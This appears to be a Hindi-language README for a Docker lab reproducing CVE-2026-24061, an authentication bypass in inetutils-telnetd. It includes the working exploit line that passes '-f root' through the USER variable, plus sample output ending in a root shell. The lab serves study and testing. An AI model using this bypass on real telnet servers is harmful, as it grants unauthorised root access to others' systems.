
एक छोटा डॉकर लैब जो cve-2026-24061, inetutils-telnetd प्रमाणीकरण बायपास के साथ खेलने के लिए है।
inetutils-telnetd 1.9.3 - 2.7 में auth bypass के साथ खेलने के लिए एक छोटा सा lab, जैसा कि oss-sec मेलिंग सूची पर खुलासा किया गया है। [0]
यह container इस तथ्य पर निर्भर करता है कि inetutils-telnetd Debian 11 (Bullseye) में अभी भी एक कमजोर संस्करण है। इसे बनाते समय, यह था:
root@ba8cc6858b87:/# apt search inetutils-telnetd
Sorting... Done
Full Text Search... Done
inetutils-telnetd/oldoldstable 2:2.0-1+deb11u2 arm64
telnet server
Container को docker build -t telnetd-exploit . के साथ clone और build करें।
Container को docker run --rm -it telnetd-exploit के साथ चलाएँ। एक संदेश आपको PoC दिखाएगा।
docker run --rm -it telnetd-exploit
Starting internet superserver: inetd.
You are user1. Try telnet as root with: USER='-f root' telnet -a localhost
user1@114102afa5d3:/$
एक सफल run कुछ इस तरह दिखेगा:
user1@114102afa5d3:/$ USER='-f root' telnet -a localhost
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Linux 6.17.8 (114102afa5d3) (pts/1)
Linux 114102afa5d3 6.17.8 #1 SMP PREEMPT Thu Nov 20 09:34:02 UTC 2025 aarch64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@114102afa5d3:~#